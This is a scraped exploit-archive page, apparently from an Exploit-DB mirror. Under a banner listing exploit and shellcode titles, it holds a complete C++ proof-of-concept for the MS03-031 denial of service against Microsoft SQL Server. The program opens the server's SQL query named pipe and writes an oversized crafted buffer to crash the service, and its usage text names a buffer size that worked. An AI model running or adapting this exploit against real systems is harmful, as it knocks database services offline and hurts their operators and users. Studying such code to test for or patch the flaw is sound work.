880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
122 lines
No EOL
3.1 KiB
C++
122 lines
No EOL
3.1 KiB
C++
source: https://www.securityfocus.com/bid/8274/info
|
|
|
|
Microsoft SQL Server and the Microsoft Data Engine have been reported prone to a denial of service attack.
|
|
|
|
Any local or remote user, who can authenticate and is part of the Everyone Group, may trigger a denial of service condition in an affected SQL Server.
|
|
|
|
It has been reported that, if a remote attacker sends an unusually large request to a named pipe, the SQL Server will become unresponsive.
|
|
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
//
|
|
// exp for Microsoft SQL Server DoS(MS03-031)
|
|
//
|
|
// By : refdom
|
|
// Email : refdom@xfocus.org
|
|
// Home Page : http://www.xfocus.org
|
|
//
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <windows.h>
|
|
|
|
|
|
void Usage()
|
|
{
|
|
printf("******************************************\n");
|
|
printf("exp for Microsoft SQL Server DoS(MS03-031)\n\n");
|
|
printf("\t Written by Refdom\n");
|
|
printf("\t Email: refdom@xfocus.org\n");
|
|
printf("\t Homepage: www.xfocus.org\n\n");
|
|
printf("Usage: DOSMSSQL.exe server buffersize\n");
|
|
printf("eg: SQLScanner.exe 192.168.0.1 9000\n\n");
|
|
printf("The buffersize depends on service pack level.\n");
|
|
printf("I test it on my server: windows 2000, mssqlserver no sp.\n");
|
|
printf("when buffersize is 9000, the server can be crashed.\n");
|
|
printf("\n");
|
|
printf("*******************************************\n\n");
|
|
}
|
|
|
|
|
|
int main(int argc, char* argv[])
|
|
{
|
|
char lpPipeName[50];
|
|
char *lpBuffer = NULL;
|
|
unsigned long ulSize = 0;
|
|
|
|
BOOL bResult;
|
|
DWORD dwWritten = 0, dwMode;
|
|
HANDLE hPipe;
|
|
|
|
Usage();
|
|
|
|
printf("Starting...\n");
|
|
|
|
if (argc != 3)
|
|
goto Exit0;
|
|
|
|
if (strlen(argv[1]) < 20)
|
|
{
|
|
sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
|
|
}
|
|
else
|
|
{
|
|
printf("Error!server\n");
|
|
goto Exit0;
|
|
}
|
|
|
|
ulSize= atol(argv[2]);
|
|
|
|
lpBuffer = (char*)malloc(ulSize + 2);
|
|
if (NULL == lpBuffer)
|
|
{
|
|
printf("malloc error!\n");
|
|
goto Exit0;
|
|
}
|
|
|
|
memset(lpBuffer, 0, ulSize + 2);
|
|
memset(lpBuffer, 'A', ulSize);
|
|
*lpBuffer = '\x12';
|
|
*(lpBuffer + 1) = '\x01';
|
|
*(lpBuffer + 2) = '\x00';
|
|
|
|
printf("Connecting Server...\n");
|
|
|
|
hPipe = CreateFile(lpPipeName,
|
|
GENERIC_READ | GENERIC_WRITE,
|
|
0,
|
|
NULL,
|
|
OPEN_EXISTING,
|
|
0,
|
|
NULL);
|
|
if (INVALID_HANDLE_VALUE == hPipe)
|
|
{
|
|
printf("Error!Connect server!%d\n", GetLastError());
|
|
goto Exit0;
|
|
}
|
|
|
|
dwMode = PIPE_READMODE_MESSAGE;
|
|
bResult = SetNamedPipeHandleState(
|
|
hPipe, // pipe handle
|
|
&dwMode, // new pipe mode
|
|
NULL, // don't set maximum bytes
|
|
NULL); // don't set maximum time
|
|
if (!bResult)
|
|
{
|
|
printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
|
|
goto Exit0;
|
|
}
|
|
|
|
bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);
|
|
|
|
if (!bResult)
|
|
{
|
|
printf("\n\tError!WriteFile.%d\n\n", GetLastError());
|
|
printf("When see the error message, the target may be crashed!!\n\n");
|
|
goto Exit0;
|
|
}
|
|
|
|
Exit0:
|
|
|
|
return 0;
|
|
} |